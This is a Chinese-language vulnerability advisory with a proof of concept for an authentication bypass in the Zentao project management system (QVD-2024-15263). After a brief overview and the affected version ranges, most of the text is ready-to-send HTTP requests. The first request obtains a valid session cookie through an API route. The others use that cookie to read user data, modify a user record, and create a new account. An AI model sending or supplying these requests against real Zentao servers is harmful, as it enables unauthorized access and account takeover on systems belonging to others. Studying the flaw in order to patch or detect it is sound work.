禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)
一、 概述
禅道(Zentao)是一款开源的项目管理和协作软件。漏洞QVD-2024-15263描述了禅道项目管理系统中的身份认证绕过漏洞。以下是漏洞的概述:
-
漏洞标识符: QVD-2024-15263
-
类型: 身份认证绕过漏洞
-
影响版本: 受影响的禅道项目管理系统的特定版本(具体版本号可能会有所不同)
-
漏洞描述: 该漏洞可能允许攻击者绕过身份验证机制,获得未经授权的访问到禅道项目管理系统的敏感信息或执行操作的权限。
-
风险等级: 高危
建议措施: 建议系统管理员尽快升级或修复受影响版本,以防止潜在的攻击。
二、影响范围
-
16.x <= 禅道项目管理系统< 18.12(开源版)
-
6.x <= 禅道项目管理系统< 8.12(企业版)
-
3.x <= 禅道项目管理系统< 4.12(旗舰版)
三、禅道身份认证POC
1. 获取cookie值
GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
Host: {ip:port}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
2. 查看用户信息
http://{ip:port}/api.php/v1/users/id
3. 修改用户信息
PUT /api.php/v1/users/1 HTTP/1.1
Host: {ip:port}
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zentaosid=2096a8f74ab1e2b7211ce133e5e83db0; lang=zh-cn; device=desktop; theme=default
Connection: close
Content-Length: 29
{
"realname": "admib"
}
4. 创建新用户
POST /api.php/v1/users HTTP/1.1
Host: {ip:port}
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zentaosid=2096a8f74ab1e2b7211ce133e5e83db0; lang=zh-cn; device=desktop; theme=default
Connection: close
Content-Length: 65
{"account": "test", "password": "123456", "realname": "test"}